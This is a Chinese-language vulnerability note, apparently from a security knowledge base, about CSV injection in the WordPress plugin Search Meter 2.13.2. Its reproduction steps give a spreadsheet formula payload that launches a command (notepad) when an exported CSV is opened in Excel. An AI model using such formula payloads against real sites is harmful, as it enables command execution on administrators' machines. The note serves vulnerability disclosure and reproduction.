menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-WordPress 插件漏洞 chevron_right 007-WordPress Plugin - Search Meter 2.13.2 CSV Injection.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    007-WordPress Plugin - Search Meter 2.13.2 CSV Injection.md
    440 B / 2021-07-17 00:01:32
        # WordPress Plugin - Search Meter 2.13.2 CSV Injection

### 一、漏洞简介

### 二、漏洞影响

### 三、复现过程

首先在搜索框里输入paylaod


```
=cmd|' /C notepad'!'A1'
```

然后访问 `http://url/wordpress/wp-admin/index.php?page=search-meter%2Fadmin.php` 并且到处csv文件

之后,我们在Excel中打开文件,并使用逗号作为分隔符从外部文件导入数据

这时候payload就会被执行了
    links
    file_download